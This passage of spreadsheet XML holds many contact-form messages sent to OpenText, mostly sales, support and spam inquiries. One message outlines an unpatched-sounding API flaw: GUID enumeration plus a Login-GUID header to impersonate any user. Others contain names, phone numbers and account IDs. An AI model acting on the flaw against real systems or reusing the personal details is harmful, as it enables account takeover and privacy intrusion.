We are looking on behalf of our client and putting together a solution for archiving their legacy EHR / EMR data.  This small health system in California (~300 beds) has been our client for many years and we presently manage their HL7 data integration.  They have a combination of McKesson and Allscripts in place as the primary data sources.  They are moving to Cerner and need somewhere to archive all their legacy which won't be migrated to Cerner.  _x000D_
_x000D_
We're looking for something that can:_x000D_
- Load data in bulk_x000D_
- Consume CCD / HL7 messages_x000D_
- Keep the CCD message as a blob to replicate_x000D_
- Persist data in order to provide longitudinal views as well_x000D_
- Unified portal to search/view all archived records _x000D_
- Terminology management and cross-walk _x000D_
- About 2 million patients; 10-15 years’ of data_x000D_
_x000D_
Would love to hear if your system can do this and get a budget for software, support and implementation._x000D_
_x000D_
Thanks in advance!_x000D_
_x000D_
Justin</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We are a software vendor who would like to integrate with OpenText to provide our customers with document management capabilities._x000D_
_x000D_
We are an ISV specializing in pensions administration software, with current clients that include the Canadian Federal Government._x000D_
_x000D_
We are currently responding to a Request for Proposal from a potential new client, and we require assistance in responding to specific questions related to document management capabilities._x000D_
_x000D_
Would you be able to put us in touch as soon as possible with the right individual to assist with this request?  We would also need to discuss pricing for the solution._x000D_
_x000D_
Regards,_x000D_
Nigel Evans</t>
  </si>
  <si>
    <t>I would like a price quote on the following licensing for RightFax enterprise:_x000D_
- Encryption_x000D_
-Additional channels</t>
  </si>
  <si>
    <t>Please take me off your dist list.  I have unsubscribed at least 5 times now and still continue to get emails.</t>
  </si>
  <si>
    <t>Inquiring about the domain name eloquent.com, which is owned by OpenText but currently unused. Where should I direct my message?</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
BMPC request pricing for the following Alchemy Software Support:_x000D_
SUID 43870-12236_x000D_
We need support for 2 year renewal if possible._x000D_
_x000D_
Please provide pricing via email._x000D_
If you have questions please contact me directly._x000D_
_x000D_
Thank you,</t>
  </si>
  <si>
    <t>Need help with Enterprise connect and outlook.</t>
  </si>
  <si>
    <t>OpenText! or review software._x000D_
_x000D_
Curious what kind of licensing you have also some basic questions of workflow process for this software or other suites you offer._x000D_
_x000D_
We upload a lot of PDF's that need reviewed by multiple managers. Need a link to be sent to each one after upload (easy enough in SharePoint). _x000D_
Wanted to give them them option to review at the same time, approve, disapprove, change status, ask/answer questions and an approved Manager to be sent the link for final issue at the end of review to either the same or upload into a different library. _x000D_
_x000D_
Also considering getting tablets for them to mark up drawings/pdfs more naturally instead of just typing as well. Curious how much you support of that. Even with pen sensitivity levels or thickness.</t>
  </si>
  <si>
    <t>We have looked at a few of the products on your website. Can you please ask someone to schedule a meeting to discuss with me? The primary focus is looking for a SharePoint replacement. We are interested in cloud versions. I prefer a call back today if possible. Thanks</t>
  </si>
  <si>
    <t>We are a reseller covering Canada and the USA. How do we buy your product for resale, through distribution or directly from you?</t>
  </si>
  <si>
    <t>I-nnovate is vetting a records management solution for a long standing client and would like to see a demo of you records management solution._x000D_
_x000D_
Thanks,_x000D_
Jackie Hanifan</t>
  </si>
  <si>
    <t>Dear Sir/Dear Madam,_x000D_
 _x000D_
Have a nice day! _x000D_
 _x000D_
Chinese company designs and produces hand made borosilicate glassware, special fashion with small MOQ._x000D_
 _x000D_
Main products are special carafes, double wall cups, storage containers and water bottles,etc._x000D_
 _x000D_
We also produce as per your design._x000D_
 _x000D_
If there is any interest pls let me know freely, I will send you more product information. We have been in glass line for more than 20 years._x000D_
 _x000D_
Thanks._x000D_
 _x000D_
Best Regards_x000D_
Michael_x000D_
_________________________________________________________________________x000D_
Dongguan Humen Tairei Hardware Glass Factory_x000D_
Add：Longgang Road, Baisha, Humen Town, Dongguan, Guangdong Province, China_x000D_
Mobile：+86 13806022132_x000D_
E-mail:michaelxue@139.com_x000D_
Skype:michaelxjx780108</t>
  </si>
  <si>
    <t>Do you have a RightFax Client version available that supports Office 2016 functionality?</t>
  </si>
  <si>
    <t xml:space="preserve">We are upgrading to Office 2016, do you currently have a client available for download that works with it? </t>
  </si>
  <si>
    <t>I would like to know whether the Redact-It tool can be used to redact native Excel files and whether the software is a standalone application or must it be integrated into a document review system.</t>
  </si>
  <si>
    <t>Hi_x000D_
I am looking to find out more about how you protect documents. looking to see if you have a demo or trial to see how OpenText works._x000D_
_x000D_
Thanks,_x000D_
Colette</t>
  </si>
  <si>
    <t>Looking for a Virtual version of RightFax Express, can some one contact me to discuss?</t>
  </si>
  <si>
    <t>My name is Rick Jones and I am Director of Business Development at The Registrar Company. We are a Registrar of quality management systems such as ISO 9001 and others. We have in place a Consultant Referral Program and I’m wondering if you have ever considered partnering up with a CB like ourselves which would provide your clients with great value and customer service from a Registrar. Please contact me with your thoughts either by phone or email. Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">We have separated from out sister company Academic Partnerships and we are needing to have the 5 Fax to Email lines that are assigned to us moved and set up on our own account. The current Academic Partnership/HEH Consolidated account I am referring to is 852235. If some one could contact me to let me know what I need to do to set this up I would appreciate it. Thanks. </t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
My name is Luis Madero and I work as a Senior Consultant in KPMG Spain. Right now, we are engaged in a benchmarking of cognitive solutions requested by a tier one bank of Spain._x000D_
We would like to know more about your OpenText InfoFusion solution._x000D_
Could you please get us in touch with appropriate person to discuss about this issue?_x000D_
_x000D_
Thank you in advance.</t>
  </si>
  <si>
    <t>To get more information on the Opentext Digital Asset Management for SAP solution  - what features it has and pricing relating to the product.</t>
  </si>
  <si>
    <t>I would like a link to video demonstration of OpenText LiveSite (not TeamSite) or if a live demonstration could be shown that would be great. I would want to see the UI and a short demo of how content can be created and updated. More advanced features such as customer profiling would not be needed in the demo. Thank you.</t>
  </si>
  <si>
    <t>We are very interested in connecting SAP BUSINESS BY DESIGN to MS SHAREPOINT. Is it facilitated with one of your products ?</t>
  </si>
  <si>
    <t>I own some stocks of Unify Corporation. In 2010 Unify acquired Daegis, and in 2011 Unify changed its name to Daegis._x000D_
How can I find out if these stocks are worth anything?  Thank you.</t>
  </si>
  <si>
    <t>Hello, Can you provide me a quote for 6 licenses of HostExplorer 15, thanx.</t>
  </si>
  <si>
    <t>Metastorm v9.3.2 Installation files(Full Package)</t>
  </si>
  <si>
    <t xml:space="preserve">I’m Shun Kimura of CTC Global Sdn Bhd, Account Manager of FSI especially for Japanese Bank and Financial institution._x000D_
_x000D_
One of my Customer is looking forward to implement AML(especially for the Name Check for Local Payment purpose) system here in Malaysia._x000D_
Are you keen to implement AML system?_x000D_
If yes I think we can collaborate on this opportunity._x000D_
We can provide the Infra HW side._x000D_
_x000D_
Please let me know if you are interested in._x000D_
</t>
  </si>
  <si>
    <t>Neiman Marcus is a customer and they require us to become EDI compliant. What is the price for your service please? Thanks.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir or Madam,_x000D_
 _x000D_
I am Amy from Cogito Software Co., Ltd and our company is a leading software distributor in China._x000D_
_x000D_
Now our customer would like to buy Documentum Compuview Navigator._x000D_
Would you please send me the price and reseller discount? _x000D_
Does the price of software include the first year of maintenance? If not, if the maintenance is mandatory?_x000D_
Could we pay it by Credit Card or Paypal?_x000D_
How could you deliver the software to us (Electronical licenses or Box)?_x000D_
We would like to become your distributor or reseller in China._x000D_
_x000D_
As we have wide connections and rich local knowledge, we firmly believe that it would be mutual beneficial if we could become your distributor or reseller within mainland China. We act as China Distributor for many outstanding foreign software._x000D_
 _x000D_
 _x000D_
About Us:_x000D_
_x000D_
COGITO was established in 2000 _x000D_
_x000D_
We corporate closely with over 2000 reseller and we had established relationships with local retail outlets and online shops._x000D_
_x000D_
We have over 40,000 users within mainland China, a large proportion of them are from government agencies, educational institutes and commercial departments._x000D_
_x000D_
We have established business relationships with many of the world's top 500 enterprises, for instance: Motorala, Simens ,Lucent-Alcate ,etc._x000D_
_x000D_
I would like to inform you that we act as sole agencies for a number of products. You can visit our website as references: _x000D_
http://www.cogito.com.cn/  (It shows some of the software that we distribute with brief introductions and trail download functions._x000D_
We look forward to your early reply._x000D_
Thank you._x000D_
 _x000D_
-- _x000D_
Kind regards, _x000D_
Amy Liu_x000D_
Marketing officer_x000D_
------------------------------------------------_x000D_
COGITO  SOFTWARE  CO., LTD._x000D_
Add: Room 1105, Tower C2, Hao Bai Da Sha,No.50 Xisanhuan North Road,Haidian District, Beijing China 100048_x000D_
TEL.: +86(010)68421378-865_x000D_
Mobile：+86 15313828669_x000D_
FAX:  +86(010)68703469 _x000D_
E-MAIL: amy@cogito.com.cn_x000D_
WEBSITE: http://www.cogitosoft.com_x000D_
</t>
  </si>
  <si>
    <t>can you send a email to me? i will provide the screenshot from my customer about the require for you .</t>
  </si>
  <si>
    <t>In the article KB482440 deals about the issue what we have. Could you provide us the CI-correction instruction to solve this issue.</t>
  </si>
  <si>
    <t>I'd like to have a demo of your product, and ask a few questions. We are interested in automating our AP invoice process.</t>
  </si>
  <si>
    <t>Access to Support portal</t>
  </si>
  <si>
    <t xml:space="preserve">Script file for ocr _x000D_
1. Initiaklizing profile script_x000D_
2. Indexing Script_x000D_
3. Pre Archive Script_x000D_
4. Archiving Script_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Editorial Team,_x000D_
_x000D_
I am working with Technoligent as a content writer and I’ve been following your blog for quite some time now, and I love your content and the lessons you share with your readers. Every time I read a post, I feel like I’m able to take a single, clear lesson away from it, which is why I think it’s so great._x000D_
_x000D_
I have written 2 Contents and their titles are:_x000D_
“6 Myths about Machine Learning That You Thought Were True" _x000D_
“How to face IoT development challenges for QA testing in 2017”_x000D_
So please reply me which topic is good to add in your site or not._x000D_
Here some potential guest blog sample:_x000D_
_x000D_
http://bigdata-madesimple.com/how-to-fetch-hbase-table-data-in-apache-phoenix/_x000D_
https://datafloq.com/read/integrate-sqoop-data-ingestion-layer-hadoop/2296_x000D_
_x000D_
Waiting for your positive Response._x000D_
_x000D_
Best regards_x000D_
Aaron Jacobson_x000D_
</t>
  </si>
  <si>
    <t>Documentum licensing policy and prices</t>
  </si>
  <si>
    <t>We are considering a documentum system for our organisation and would like to discuss next steps</t>
  </si>
  <si>
    <t>Looking some point of contact to provide details on Ixos implementation.</t>
  </si>
  <si>
    <t>Deployment of SAP ADA  on cloud.</t>
  </si>
  <si>
    <t xml:space="preserve">We are interested in seeing a demo of Documentum, or a comparable application. Thank you.  </t>
  </si>
  <si>
    <t xml:space="preserve">Need information on becoming a vendor for floor care and janitorial maintenance. We are currently the preferred company in the south east region United States. We currently service more than 400 locations for South East Grocers as well as many specialty small box retailers. I would like to see if we could be of any assistance and fulfill any needs in our existing foot print. Thank you for your time. </t>
  </si>
  <si>
    <t>I am curious to know what type of training do you offer that is related to Access Control, Information Security, or Permissions management. Also What Open Text seminars would be helpful for me to attend if I am in the Information Security Field.</t>
  </si>
  <si>
    <t xml:space="preserve">Good afternoon,_x000D_
_x000D_
Honeywell International is a highly diversified, global corporation with significant operations in 40+ countries around the world with 2015 revenue of $38.6B. _x000D_
_x000D_
Honeywell will be performing an RFI as we are evaluating the current Content Management tools available in the marketplace as we are reviewing our long term strategy for this space. Honeywell would be interested in looking into the solution your company offers and therefore invites you to participate in this RFI._x000D_
_x000D_
The purpose of the  RFI is to help us understand in more detail the offering available in the market  and how the capabilities of your tool addresses the requirements Honeywell has. We also want to understand your licensing and pricing options in case we decide to issue a formal RFP, and business case in the near future. The tool we are interested in evaluating is Open Text Enterprise Content Management.  _x000D_
_x000D_
If you are interested in participating in the RFI below you will find next steps:_x000D_
_x000D_
_x000D_
1.	Reply to this email confirming that you are interested in participating and assign a focal point in your company to manage the process and receive all documentation. Please provide the following information for the contact person:_x000D_
a.	Your complete company legal entity name_x000D_
b.	Name and Last name of the resource you assign_x000D_
c.	Email address_x000D_
d.	Phone number_x000D_
e.	Time zone where he/she is located_x000D_
_x000D_
Please contact us asap as the RFI will be released next week._x000D_
</t>
  </si>
  <si>
    <t>I want to Apply For JOB</t>
  </si>
  <si>
    <t>Let me know whether one can appear for certification course named "Content Server Business Consultant Certification Exam v16" without attending below pre-requisite courses on Site_x000D_
_x000D_
•1-0184 Managing Documents in Content Server (2 days) _x000D_
•1-0185 Collaborating in Content Server (2 days) _x000D_
•2-0113 Content Server Workflow Design (3 days) _x000D_
•2-0114 Content Server Forms Design (1 days) _x000D_
•2-0120 OpenText Records Management (3 days) _x000D_
_x000D_
I would like to explore possibility of directly appearing for  certification course named "Content Server Business Consultant Certification Exam v16" once my preparation is over.</t>
  </si>
  <si>
    <t>Hello, _x000D_
_x000D_
I am a 3rd party/outsource IT vendor in the Milwaukee area. Recently a customer of ours came to us in regards to their failing on premise Esker Fax server. I don't not deal with these often but need to work to get quotes for this customer to replace the failing unit they have now._x000D_
_x000D_
-	On-premise fax server, minimal storage needed on the appliance itself they dump all incoming faxes to shared storage_x000D_
o	26k monthly inbound, 24k monthly outbound on average_x000D_
o	PRI – 8 numbers available_x000D_
o	20-25 users_x000D_
_x000D_
second option_x000D_
_x000D_
-	Virtual Appliance with a tele gateway to connect to the PRI_x000D_
o	Same volume_x000D_
o	Same user count_x000D_
o	PRI – 8 numbers available_x000D_
o	Preferably works with 2012 std R2_x000D_
_x000D_
They would be open to quotes for cloud/hosted solutions, but at their volumes I would be uncertain if that is financially feasible. please feel free to contact me with any questions or needs for additional information._x000D_
_x000D_
thanks, _x000D_
Keegan</t>
  </si>
  <si>
    <t xml:space="preserve">Demo/capabilities of authoring and content management systems. </t>
  </si>
  <si>
    <t>Hello, I am currently providing Fax2Mail to some of our customers, and by law I am required to determine whether this service is accessible for customers who have disabilities. The Fax2Mail service appears to fall under the purview of the 21st Century Communications and Video Accessibility Act (CVAA), so anyone providing access to this service must ensure its compliance with accessibility standards. Has your company validated the accessibility of this product, and if so, do you have a Voluntary Product Accessibility Template (VPAT) stating its compliance or non-compliance with applicable accessibility standards?_x000D_
Thank you</t>
  </si>
  <si>
    <t xml:space="preserve">Do you offer a reselller program? _x000D_
_x000D_
Thanks! </t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
We are B2B contact provider._x000D_
_x000D_
We have complete contact detailed of Director, CEO, Production Managers, Audio Director, Senior Sound Designer, Audio Supervisor, Senior Audio Lead, Audio Project Manager, Creative Director, Engineers, Technician, CTO/VP Engineering/Technological Directors/Managers and other key decision makers who might be interested in your product and services._x000D_
_x000D_
Industries: Digital Media, Broadcast System Integrators, Film and Entertainment, Post Production, Virtual and Augmented Reality, Sports, Live Events, Academic World, Audio &amp; Video Production, Cable &amp; Satellite Distribution, Consulting, Manufacturing, Media &amp; Entertainment, Publishing, Radio Broadcasting, Retail, TV Broadcasting, Education, Advertising, Security, IT Advertising,  etc._x000D_
_x000D_
To understand your needs better, kindly send me your exact target audience._x000D_
_x000D_
Target Industry:_x000D_
Target job title:_x000D_
Target Geography:_x000D_
_x000D_
Thank you and look forward for your response._x000D_
_x000D_
Regards,_x000D_
Peter Thomas | Marketing Manager</t>
  </si>
  <si>
    <t>Interested in purchasing a Captiva Software product.</t>
  </si>
  <si>
    <t>uploading images</t>
  </si>
  <si>
    <t>need to purchase RF Enterprise, RF VOIP solution, RF integration module, 16 RF VOIP channels and annual service contract to replace existing  RF 9.3.2 environment. Need quote for purchase ASAP as environment is End of LIFE for existing hardware and OS</t>
  </si>
  <si>
    <t>I would like to register my email to receive  emails for : Stage Stores Supply Chain Notifications/ Violations. Would you please help me or direct to the right person/department</t>
  </si>
  <si>
    <t>Hello,_x000D_
JDA currently has an agreement that I need to have reviewed by someone at OpenText and the two contacts I have are both no longer valid.  Would someone please send me to the correct person so I can get some assistance?  Thanks much!_x000D_
_x000D_
Lisa Linkous_x000D_
Operations Analyst</t>
  </si>
  <si>
    <t xml:space="preserve">I have a federal government customer asking for Rightfax.  Do you sell through distributors/resellers, or only direct to customer?  </t>
  </si>
  <si>
    <t>Need access to OpenText My Support - I am trying to look up a OpenText ticket and bug number.</t>
  </si>
  <si>
    <t>Hi I have some candidates for your Jr Operations Analyst Contract Position.  Please let me know what email address I can forward candidates to and who attention._x000D_
Thanks _x000D_
Jim Carter _x000D_
Agile Global Solutions _x000D_
Jim@agileglobalsolutions.com</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We're trying to reset the password associated with the network/user ID that we use to download GXS catalog data. The account details are as follows:_x000D_
_x000D_
Network ID: R2696_x000D_
User ID: R2696A_x000D_
_x000D_
One of our users recently requested to reset the password. The system then displayed a message that password reset information had been sent to the email address associated with the account, but we have not received any such email. Would you be able to let us know which email address is associated with the account, or to help us reset the password? Thank you for your help._x000D_
_x000D_
Diego Mina_x000D_
Systems Administrator_x000D_
Mayer Berkshire Corp_x000D_
25 Edison Drive_x000D_
Wayne, New Jersey 07470</t>
  </si>
  <si>
    <t>I just wanted information on your new Hummingbird Mega Imaging fish grafts? Simply put, are they as good as the Ray Marine Dragonfly 7?? I am buying on or the other. Thanks for any information u can give me. Not sure I am on the right sight?</t>
  </si>
  <si>
    <t>Customer ID 183558 Please let me know when next invoice is due</t>
  </si>
  <si>
    <t>I am interested in being a supplier in the bedding area, selling mattress protectors, pillow protectors and bed sheet sets.</t>
  </si>
  <si>
    <t>I need verification as to which GLN is being transmitted over to Sears.  I uploaded 20 different GTIN's yesterday (i.e. 887661378507) and Sears advised me that they see 2 different GLN accounts associated to us but not our current GLN 010062312087.  Thank you.</t>
  </si>
  <si>
    <t>I request email to send information on health management for employees or foreign guests in Barcelona or Madrid.</t>
  </si>
  <si>
    <t>I'd like to attend the '3-0188 OpenText Content Server System Administrator v16' course, but unable to make the April dates in Reading. _x000D_
Do you happen to know when the next dates the course will be held?</t>
  </si>
  <si>
    <t>We are looking for a solution for Vendor Invoice Processing automation and document archiving, in addition to any possible other business process automation potential._x000D_
_x000D_
Is Open Text compatible/integrable with SAP ECC 6.0?_x000D_
_x000D_
Thank you.</t>
  </si>
  <si>
    <t>Looking at fax server solutions.</t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour,_x000D_
_x000D_
Je n'ai pas reçu la facture pour la période de janvier 2017, pouvez-vous me la transmettre,notre numéro de client  chez vous 76417._x000D_
Bien cordialement,_x000D_
Isabelle DOSSIN </t>
  </si>
  <si>
    <t>need quotation for "standard support for rightfax"</t>
  </si>
  <si>
    <t>Trying, unseccessfully, to update trial version. Do not see a way to purchase</t>
  </si>
  <si>
    <t>Hi _x000D_
I would like to know more about Opentext CMS. _x000D_
- Prices/Licencemodels_x000D_
- Programing language (.Net?)_x000D_
- Open Source CSS?_x000D_
- Reference companies for CMS_x000D_
-  Futures for CMS_x000D_
-  Security_x000D_
-  Cloud or on Premise_x000D_
- Support conditions and community_x000D_
_x000D_
Thanks _x000D_
Regards_x000D_
Alptekin Kocaaga</t>
  </si>
  <si>
    <t>Looking for an application (possibly Captiva) to be able to scan tax documents received and populate specific fields of an excel spreadsheet with data from the form scanned into the system.</t>
  </si>
  <si>
    <t>We will Change Adobe Reader by Foxit Reader. Can OpenText print documents with Foxit Reader as default Reader in Browser IE11?</t>
  </si>
  <si>
    <t>Dear Sir or Madam,_x000D_
_x000D_
I write to you from the company T-Organiza to be a partner of your product here in Spain._x000D_
We are a company specialized in Document Management, and we have worked in different projects of Organization of Archives, Libraries,_x000D_
Digitalization of documents and conversion to digital files_x000D_
Implementation of Document Manager_x000D_
Digital Archives_x000D_
Digital Repositories, ..._x000D_
I would be very grateful if you provided us with information about the procedure to be able to offer your product here._x000D_
_x000D_
Thanks for your attention._x000D_
Yours sincerely,_x000D_
_x000D_
Manuela Martínez_x000D_
manumartinez@t-organiza.es_x000D_
A greeting.</t>
  </si>
  <si>
    <t xml:space="preserve">Goedemorgen Mijnheer,  Mevrouw, _x000D_
_x000D_
In verband met een nieuw seizoen in aantocht, dus nieuwe “ Lente” mogelijkheden, willen wij graag onze “schoonmaakdiensten” aanbieden, voor eventuele opleveringen van bedrijfspanden en of kantoren._x000D_
Aangezien we een jong en enthousiast team zijn, aangevuld met ervaring, wil ik graag ons bedrijf in kaart brengen bij diverse partijen. Zeker waar onze expertise/kennis het best tot z’n recht komt._x000D_
_x000D_
Daarom een verzoek of wij elkaar middels een  “Helder” gesprek kunnen ontmoeten en ik u Knijn-Damsma mag voorstellen?_x000D_
_x000D_
Hopend dat we een “ nieuwe” partij kunnen zijn die van toegevoegde waarde is, voor o.a. uw bedrijfspand(en)!_x000D_
Zie graag u reactie tegemoet.                                                                                                                 _x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Greetings from Nepal with Cool Himalayan Country..._x000D_
_x000D_
We are specialized Offering professional Web Design &amp; Development services. In a completely professional, supportive and trusted manner, our experts will support your needs with high standard solutions that are targeted to trim down your costs, expand business &amp; image, increase revenues &amp; save great amount of time. _x000D_
_x000D_
We provide wide range of Website development services like:- _x000D_
_x000D_
1. PHP Web Development. _x000D_
2. Ecommerce Web Solutions. _x000D_
3. HTML5 / CSS3 Web Design. _x000D_
4. Website designing - Logo Design, HTML designing, corporate website design, PSD to XHTML/HTML, etc. _x000D_
5. Responsive Website. _x000D_
6. Open source customization/ CMS Wordpress, etc. _x000D_
7. iOS and Android Mobile Application Development _x000D_
8. Web Application Development using JAVA. _x000D_
_x000D_
If you have any Projects for us to work from Nepal, we welcome them. We are in the process of Rebuilding Earthquake Torn Nepal and hence we need lot of work. _x000D_
_x000D_
Please have a look at our Main Team-Players Profiles at http://www.igctech.com.np/team/team.pdf/_x000D_
_x000D_
Assuring you our commitment to make this project a success! _x000D_
_x000D_
Thank you very much. _x000D_
Kind Regards, _x000D_
Roshan Maharjan _x000D_
IGC Technology Incentive Group of Companies Metro Park, _x000D_
Lazimpat, Kathmandu, _x000D_
Nepal</t>
  </si>
  <si>
    <t>Hi._x000D_
I recently tested your product for vulnerabilities and I think I found a logic flaw._x000D_
The Swagger API v2 doc states, that Authorization is possible by sending the Login-GUID header. It is possible to enummerate all user GUIDs on the system as an authenticated user._x000D_
Therefore it is possible to make API calls as any user._x000D_
_x000D_
Please send me an email if you are interested in some details._x000D_
_x000D_
Regards_x000D_
David</t>
  </si>
  <si>
    <t>Hi there.  Can you please send me any collateral you have in regard to work that you have undertaken with healthcare organisations?_x000D_
_x000D_
Thanks in advance.</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren,_x000D_
_x000D_
können Sie mir bitte einen unverbindlichen Angebot oder ein Informationsblatt für den Bereich „Leistungsbeschreibung und Preise für die Einrichtung bzw. Nutzung von MailBox X.400“ zusenden._x000D_
_x000D_
Vielen Dank im Voraus!_x000D_
_x000D_
Freundliche Grüsse_x000D_
Ludmila Weber_x000D_
</t>
  </si>
  <si>
    <t>Looking for better prospective</t>
  </si>
  <si>
    <t>EATC is a SIP service provider in Saudi Arabia. We're very keen on conducting an interoperability Test with OpenText Right FAX product to make sure our customers using this popular solution would have it integrated with our service. Currently Right FAX is very challenging to integrate with, an Iinteroperability test will be very helpful to clear these challenges. this will increase attractiveness of your RightFAX in Saudi Market.</t>
  </si>
  <si>
    <t>Hi, we are trying to change the way we use eDOCS DM so that we wouldn't need to use Office add-ins. We have everything else already sorted out, but still face problems when opening Powerpoint files using .drf links. Is there a possibility for technical support directly from your experts?_x000D_
_x000D_
Best regards,_x000D_
Mikko Oksanen</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
We can fairly quickly promote your website to the top of the search rankings with no long term contracts!_x000D_
_x000D_
We can place your website on top of the Natural Listings on Google, Yahoo and MSN. Our Search Engine Optimization team delivers more top rankings then anyone else and we can prove it. We do not use "link farms" or "black hat" methods that Google and the other search engines frown upon and can use to de-list or ban your site. The techniques are proprietary, involving some valuable closely held trade secrets. Our prices are less then half of what other companies charge._x000D_
_x000D_
We would be happy to send you a proposal using the top search phrases for your area of expertise. Please contact me at your convenience so we can start saving you some money._x000D_
_x000D_
In order for us to respond to your request for information, please include your Name, company’s website address (mandatory) and /or phone number._x000D_
_x000D_
Sincerely,_x000D_
Max William_x000D_
max.seomarketing1@gmail.com_x000D_
_x000D_
COMPLETE INTERNET MARKETING SOLUTION_x000D_
SEO - PPC - SMO - Link Building - Copyright - Web Designing - PHP</t>
  </si>
  <si>
    <t xml:space="preserve">Am fresher i have theoritical knowledge but i can do hardwork for my organization and i will put my all efforts for good progress of organization </t>
  </si>
  <si>
    <t>Saludos,_x000D_
_x000D_
Por este medio, quisiera me puedan apoyar en los siguientes servicios si es que es viable para ustedes:_x000D_
_x000D_
Tengo 1,000,000 de documentos distribuidos de la siguiente manera:_x000D_
_x000D_
1. Aprox. 30,000 expedientes con 500,000 páginas _x000D_
2. Aprox. 30,000 libros contables (antiguos) con al rededor de otros 250,000 Hojas ambos lados   Buscamos digitalizar dichos documentos y el poder subirlos a un Gestor Documental para la consulta, marcas de agua, tratamiento sin afectar el documento original y poder mandar en algunas ocasiones dicho documento vía correo electrónico.   Me podrías por favor apoyar en cotizar :  1. La maquila (digitalización) de documentos. Los expedientes algunos tienen hojas sueltas y otros engrapadas. 2. La maquila ( digitalización) de libros. Se requiere cierto cuidado pues son antiguos y necesitamos conservar la integridad del libro. 3. Plataforma para gestión de documentos 4. Alimentarla con la maquila antes mencionada. En dónde calculamos poderlo ordenar en base a 5 parámetros (a definir) para su búsquead y manejo. 5. Capacitación para el personal:_x000D_
        1. A nivel Administrador del Gestor Documental (2)_x000D_
        2. A nivel Consulta y uso administrativo (8) _x000D_
        3.  A nivel Operación diaria - Maquila y procesamiento en adelante (4)_x000D_
_x000D_
Las premisas:_x000D_
a. Queremos que se digitalice en sitio (Puebla, Mex.) en un lapso no mayor a 3 meses._x000D_
b. Conocer si manejan alguna plataforma basada en la nube ó en sitio. Presentar ambas opciones_x000D_
c. Capacitación para los perfiles antes señalados _x000D_
_x000D_
Sin mas por el momento, _x000D_
Gracias</t>
  </si>
  <si>
    <t>To whom it may concern,_x000D_
_x000D_
Hello._x000D_
_x000D_
This is Naoki Yasuda from Daijob.com._x000D_
I am writing this email to introduce  you about our job posting site for bilingual talents in Japan, Daijob.com_x000D_
_x000D_
I was wondering if we could help recruitment in Japan._x000D_
_x000D_
We are Japan’s biggest job posting website aiming to help global or internationally related companies and agencies to recruit highly qualified multilingual mid-career professionals._x000D_
_x000D_
We are doing huge promotion right now,so new candidate are coming to our site._x000D_
_x000D_
Here are our service guide. Please reffer below._x000D_
_x000D_
[What's Daijob.com??]_x000D_
_x000D_
1) Daijob Brochure_x000D_
http://go.daijob.com/brochure_en_x000D_
* Japan's biggest job posting website for bilinguals_x000D_
* About 490,000 global candidates with over 3,000 new registers every month_x000D_
_x000D_
Price list :  http://go.daijob.com/g_price_en _x000D_
_x000D_
2)Career Fair_x000D_
http://go.daijob.com/careerfair2016_en_x000D_
* 3 times in a year we held job fair for bilinguals._x000D_
* 30+ global companies join us and 600+ candidates come to find job every time._x000D_
_x000D_
If you have any questions for our services or need quotation or more data, please kindly let me know._x000D_
I would be more than happy to be your help._x000D_
I am looking forward to hearing back from you soon._x000D_
_x000D_
Have a nice day!_x000D_
_x000D_
Sincerely yours,_x000D_
Naoki　Yasuda_x000D_
_x000D_
-- _x000D_
Daijob Global Recruiting Co., Ltd._x000D_
_x000D_
Domestic Sales Department_x000D_
Akasaka Enoki-zaka Bldg.5F, 1-7-1 Akasaka, Minato-ku Tokyo 107-0052_x000D_
_x000D_
Tel: +81 (0)3 6682 5481  Fax: +81 (0)3 6682 5485_x000D_
_x000D_
Email: na-yasuda@daijob.com_x000D_
_x000D_
https://corp.daijob.com/_x000D_
_x000D_
- To provide the best positions for globally-minded people. -</t>
  </si>
  <si>
    <t xml:space="preserve">My name is Paul Smith associated with InfoGlobalData, a Data Intelligence firm based out of Seattle, WA._x000D_
_x000D_
Would you be interested acquiring a contact Information from IT &amp; Other Industry?_x000D_
_x000D_
List Include: Software Companies, Construction Companies, Oil &amp; Gas Companies, NGO’s, Engineering &amp; Construction, Oil &amp; Gas, and Energy &amp; Utilities and Mineral &amp; Chemical Processing industry sectors._x000D_
_x000D_
Job Title: CEO, CFO, CTO, Managing Director, Director of Projects, Project Director, Senior Project Manager, Project Manager, Corporate Risk Manager, Operations Manager, Construction Manager, Risk Engineer, Project Engineer, Senior Database Administrator, etc._x000D_
_x000D_
Geography: USA, Canada, UK, Europe, Middle East &amp; Asia._x000D_
_x000D_
If interested, do let me know what type of Target Audience/Job title/Geography you are looking for?_x000D_
_x000D_
Respectfully,_x000D_
_x000D_
Paul Smith_x000D_
InfoGlobalData_x000D_
</t>
  </si>
  <si>
    <t>Interested in adopting OpenText for Engineering Drawings.  We use Meridian Bluecielo for our airport drawings, and want to expand to include Highway and Public Works' Buildings.  Our governments standard document management system for classic administrative records is OpenText, and we want to compare Meridian vs OpenText to make an evaluation of the best course.</t>
  </si>
  <si>
    <t>How do we access our EMC xPression Support now?  Powerlink doesn't seem to work anymore.</t>
  </si>
  <si>
    <t xml:space="preserve">We’re exploring an EA tool to help our journey and we’re looking at, but not limited to the following capabilities (no order implied):_x000D_
_x000D_
•	Easy to use (probably #1) from an EA and Business Relationship Manager viewpoint_x000D_
•	Easy to administer _x000D_
•	Ease to build and maintain inventories:_x000D_
o	Applications_x000D_
o	Interfaces_x000D_
o	Data Objects_x000D_
o	Business Processes_x000D_
o	Etc._x000D_
•	Easy to build Roadmaps (business and executive views)_x000D_
•	Easy to build Blueprints and Solution Diagrams (More technical business and IT views)_x000D_
o	Easy to embed components from inventories_x000D_
	Applications_x000D_
	Interfaces_x000D_
	Data Objects_x000D_
	Business processes _x000D_
•	Easy build “Easy to consume” presentations for executive, business, and technical views_x000D_
•	Easy to determine impact Analysis_x000D_
o	Relationship of objects_x000D_
o	Where objects are in use_x000D_
•	Easy to  build reports and analytics_x000D_
</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
